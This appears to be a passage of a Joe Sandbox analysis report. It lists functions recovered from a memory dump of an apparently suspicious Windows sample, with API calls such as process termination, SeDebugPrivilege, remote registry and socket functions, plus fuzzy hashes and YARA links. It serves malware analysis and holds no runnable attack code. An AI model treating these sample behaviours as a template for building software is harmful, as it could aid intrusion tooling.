                                                                                                                                                        • Instruction ID: 6146d723a564cdd1cb7c7a010ecaa370ff78a1db42ab2aed9e4d5a956a17950c
                                                                                                                                                        • Opcode Fuzzy Hash: d8b57305c51f908054750416766cede815fa966fafa436d1355b2b007efb7beb
                                                                                                                                                        • Instruction Fuzzy Hash: AA1104B1550618BEF7106F648C8EFAA3B2DDB18754F910419F3406B0E0CDF2AC109AA4
                                                                                                                                                        Function 00AEC604 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00ACA857: CLSIDFromProgID.COMBASE ref: 00ACA874
                                                                                                                                                          • Part of subcall function 00ACA857: ProgIDFromCLSID.COMBASE(?,00000000), ref: 00ACA88F
                                                                                                                                                          • Part of subcall function 00ACA857: lstrcmpiW.KERNEL32(?,00000000), ref: 00ACA89D
                                                                                                                                                          • Part of subcall function 00ACA857: CoTaskMemFree.COMBASE(00000000), ref: 00ACA8AD
                                                                                                                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 00AEC6AD
                                                                                                                                                        • _memset.LIBCMT ref: 00AEC6BA
                                                                                                                                                        • _memset.LIBCMT ref: 00AEC7D8
                                                                                                                                                        • CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000001), ref: 00AEC804
                                                                                                                                                        • CoTaskMemFree.COMBASE(?), ref: 00AEC80F
                                                                                                                                                        Strings
                                                                                                                                                        • NULL Pointer assignment, xrefs: 00AEC85D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                                                        • String ID: NULL Pointer assignment
                                                                                                                                                        • API String ID: 1300414916-2785691316
                                                                                                                                                        • Opcode ID: 3fe4284342e7f3faabb1a955b26e0c099aad8c24c41a0c9b97105c2a5a5bfbd1
                                                                                                                                                        • Instruction ID: a4a38d484dd3c68db47421707660916ce6c0f1bc3341176d864a9a2bad6aa724
                                                                                                                                                        • Opcode Fuzzy Hash: 3fe4284342e7f3faabb1a955b26e0c099aad8c24c41a0c9b97105c2a5a5bfbd1
                                                                                                                                                        • Instruction Fuzzy Hash: 6E913971D00218ABDF10DFA5DD81EDEBBB9EF08720F20416AF519A7291DB705A45CFA0
                                                                                                                                                        Function 00AF9882 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00AF9926
                                                                                                                                                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 00AF993A
                                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00AF9954
                                                                                                                                                        • _wcscat.LIBCMT ref: 00AF99AF
                                                                                                                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 00AF99C6
                                                                                                                                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00AF99F4
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend$Window_wcscat
                                                                                                                                                        • String ID: SysListView32
                                                                                                                                                        • API String ID: 307300125-78025650
                                                                                                                                                        • Opcode ID: 998e27df25b0151c20e9461d28969ff0c13d610737ae6f512c49347a28894de4
                                                                                                                                                        • Instruction ID: a834b7e2d046a5318cc4b42bf36702deff419b172d37067c20aacf2e6c97db37
                                                                                                                                                        • Opcode Fuzzy Hash: 998e27df25b0151c20e9461d28969ff0c13d610737ae6f512c49347a28894de4
                                                                                                                                                        • Instruction Fuzzy Hash: 0841A171900308ABEF219FA4C885FEF77E8EF09350F10446AF689A7291D7719D848B60
                                                                                                                                                        Function 00AF1620 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AD6F5B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00AD6F7D
                                                                                                                                                          • Part of subcall function 00AD6F5B: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00AD6F8D
                                                                                                                                                          • Part of subcall function 00AD6F5B: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00AD7022
                                                                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00AF168B
                                                                                                                                                        • GetLastError.KERNEL32 ref: 00AF169E
                                                                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00AF16CA
                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00AF1746
                                                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 00AF1751
                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00AF1786
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                        • String ID: SeDebugPrivilege
                                                                                                                                                        • API String ID: 2533919879-2896544425
                                                                                                                                                        • Opcode ID: c3231cbd3104c155aab1f045ca3e427a49e1c37645979a1fe76905d98f985d80
                                                                                                                                                        • Instruction ID: 3a351b84af91f0353693e7153c2533541ba135316923ef816ce6f625d58f76c6
                                                                                                                                                        • Opcode Fuzzy Hash: c3231cbd3104c155aab1f045ca3e427a49e1c37645979a1fe76905d98f985d80
                                                                                                                                                        • Instruction Fuzzy Hash: A0418B75700206AFDB04EF94CAA6FBDB7E5AF54714F048049FA0A9F292DB799804CF51
                                                                                                                                                        Function 00AD6237 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • LoadIconW.USER32(00000000,00007F03), ref: 00AD62D6
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: IconLoad
                                                                                                                                                        • String ID: blank$info$question$stop$warning
                                                                                                                                                        • API String ID: 2457776203-404129466
                                                                                                                                                        • Opcode ID: 10a0fd68dd753fa19976bd80cc453a2c2b7fcfc1770ca04d1f707fc4aaf32308
                                                                                                                                                        • Instruction ID: 328f334f0b1f2384aeb29d9cb4a56f45096ccb1924b5852a1c52e824afaf9d9a
                                                                                                                                                        • Opcode Fuzzy Hash: 10a0fd68dd753fa19976bd80cc453a2c2b7fcfc1770ca04d1f707fc4aaf32308
                                                                                                                                                        • Instruction Fuzzy Hash: BF112C31A0C343BAE7055B55DC92DEA73EC9F1A724B20002BF502A63C3FBF4AB414564
                                                                                                                                                        Function 00AD757B Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000100,00000000), ref: 00AD7595
                                                                                                                                                        • LoadStringW.USER32(00000000), ref: 00AD759C
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00AD75B2
                                                                                                                                                        • LoadStringW.USER32(00000000), ref: 00AD75B9
                                                                                                                                                        • _wprintf.LIBCMT ref: 00AD75DF
                                                                                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00AD75FD
                                                                                                                                                        Strings
                                                                                                                                                        • %s (%d) : ==> %s: %s %s, xrefs: 00AD75DA
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                        • API String ID: 3648134473-3128320259
                                                                                                                                                        • Opcode ID: 3d116df02c6537f488563a2e3689af6e12dab70ab9f0a8b13d5dc6644a866eda
                                                                                                                                                        • Instruction ID: 9f03e54900a94d92f1814d6e68b1f6d4569e508db931165e686a3cd74456045a
                                                                                                                                                        • Opcode Fuzzy Hash: 3d116df02c6537f488563a2e3689af6e12dab70ab9f0a8b13d5dc6644a866eda
                                                                                                                                                        • Instruction Fuzzy Hash: 7A0136F6500208BFE711A794ED89EEB776CDB04301F4044A6B746E3041EE789E848B75
                                                                                                                                                        Function 00AF2A0A Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                                                                                                                                                          • Part of subcall function 00AF3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AF2AA6,?,?), ref: 00AF3B0E
                                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AF2AE7
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: BuffCharConnectRegistryUpper_memmove
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3479070676-0
                                                                                                                                                        • Opcode ID: 511635dc24a2d0d3c4524c7ea5f718d7b33f104966549ab420347d6ee81a338d
                                                                                                                                                        • Instruction ID: 8e307017b5c0169325279f3ea7063b7058538ed28f39ecf4a8fc635d859abb40
                                                                                                                                                        • Opcode Fuzzy Hash: 511635dc24a2d0d3c4524c7ea5f718d7b33f104966549ab420347d6ee81a338d
                                                                                                                                                        • Instruction Fuzzy Hash: BD917831604205AFCB01EF94C995B6EB7E5FF88314F14881DFA969B2A1DB34E946CF42
                                                                                                                                                        Function 00AE9A66 Relevance: 12.2, APIs: 8, Instructions: 247networkCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • select.WS2_32 ref: 00AE9B38
                                                                                                                                                        • WSAGetLastError.WS2_32(00000000), ref: 00AE9B45
                                                                                                                                                        • __WSAFDIsSet.WS2_32(00000000,?), ref: 00AE9B6F
                                                                                                                                                        • WSAGetLastError.WS2_32(00000000), ref: 00AE9B9F
                                                                                                                                                        • htons.WS2_32(?), ref: 00AE9C51
                                                                                                                                                        • inet_ntoa.WS2_32(?), ref: 00AE9C0C
                                                                                                                                                          • Part of subcall function 00ACE0F5: _strlen.LIBCMT ref: 00ACE0FF
                                                                                                                                                          • Part of subcall function 00ACE0F5: _memmove.LIBCMT ref: 00ACE121
                                                                                                                                                        • _strlen.LIBCMT ref: 00AE9CA7
                                                                                                                                                        • _memmove.LIBCMT ref: 00AE9D10
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLast_memmove_strlen$htonsinet_ntoaselect
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3637404534-0
                                                                                                                                                        • Opcode ID: c1dfc2f7458858eb5f464fbae63ff2605c35b5fc9e6d2027010b5408a6fc2ae0
                                                                                                                                                        • Instruction ID: b4fa80dfec5f76868598a65483cac54477ecf3a6275f9f7eb1ab3521c8d6c30a
                                                                                                                                                        • Opcode Fuzzy Hash: c1dfc2f7458858eb5f464fbae63ff2605c35b5fc9e6d2027010b5408a6fc2ae0
                                                                                                                                                        • Instruction Fuzzy Hash: B4819C71604340AFDB10EF25CD85EABB7E9EB89724F104629F5559B291DB30D904CBA2
                                                                                                                                                        Function 00ABB72C Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __mtinitlocknum.LIBCMT ref: 00ABB744
                                                                                                                                                          • Part of subcall function 00AB8A0C: __FF_MSGBANNER.LIBCMT ref: 00AB8A21
                                                                                                                                                          • Part of subcall function 00AB8A0C: __NMSG_WRITE.LIBCMT ref: 00AB8A28
                                                                                                                                                          • Part of subcall function 00AB8A0C: __malloc_crt.LIBCMT ref: 00AB8A48
                                                                                                                                                        • __lock.LIBCMT ref: 00ABB757
                                                                                                                                                        • __lock.LIBCMT ref: 00ABB7A3
                                                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00B46948,00000018,00AC6C2B,?,00000000,00000109), ref: 00ABB7BF
                                                                                                                                                        • RtlEnterCriticalSection.NTDLL(8000000C), ref: 00ABB7DC
                                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(8000000C), ref: 00ABB7EC
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1422805418-0
                                                                                                                                                        • Opcode ID: d3d3fb8380b9dd835b6a2190f036388a801944557347159029afc0a3e191ff0a
                                                                                                                                                        • Instruction ID: a889a091190f0adf331888e4233a28f30e17370c6a723ade7a01763c0c99e4a6
                                                                                                                                                        • Opcode Fuzzy Hash: d3d3fb8380b9dd835b6a2190f036388a801944557347159029afc0a3e191ff0a
                                                                                                                                                        • Instruction Fuzzy Hash: 3F412471D213159BEB10AFACD9443ECB7ACBF41325F108219E425AB2D3CBB59940CBA0
                                                                                                                                                        Function 00ADA1B7 Relevance: 12.1, APIs: 8, Instructions: 100fileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 00ADA1CE
                                                                                                                                                          • Part of subcall function 00AB010A: std::exception::exception.LIBCMT ref: 00AB013E
                                                                                                                                                          • Part of subcall function 00AB010A: __CxxThrowException@8.LIBCMT ref: 00AB0153
                                                                                                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00ADA205
                                                                                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 00ADA221
                                                                                                                                                        • _memmove.LIBCMT ref: 00ADA26F
                                                                                                                                                        • _memmove.LIBCMT ref: 00ADA28C
                                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 00ADA29B
                                                                                                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00ADA2B0
                                                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00ADA2CF
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 256516436-0
                                                                                                                                                        • Opcode ID: f09156fe21eb4e5e203fcdc5a4d75571ff140a638df78a1a91034ece859e79f7
                                                                                                                                                        • Instruction ID: 4cbb1d92f47726e9ea864de675f12f48f7c8e802c2c1bd6852bbc98d0fe7036a
                                                                                                                                                        • Opcode Fuzzy Hash: f09156fe21eb4e5e203fcdc5a4d75571ff140a638df78a1a91034ece859e79f7
                                                                                                                                                        • Instruction Fuzzy Hash: 4B317031A00105ABCB00EFA9DD85EEEBBB8EF45310B5480A5F905AB256DB74DE14CBA1
                                                                                                                                                        Function 00AF8CDB Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00AF8CF3
                                                                                                                                                        • GetDC.USER32(00000000), ref: 00AF8CFB
                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00AF8D06
                                                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00AF8D12
                                                                                                                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00AF8D4E
                                                                                                                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00AF8D5F
                                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00AF8D99
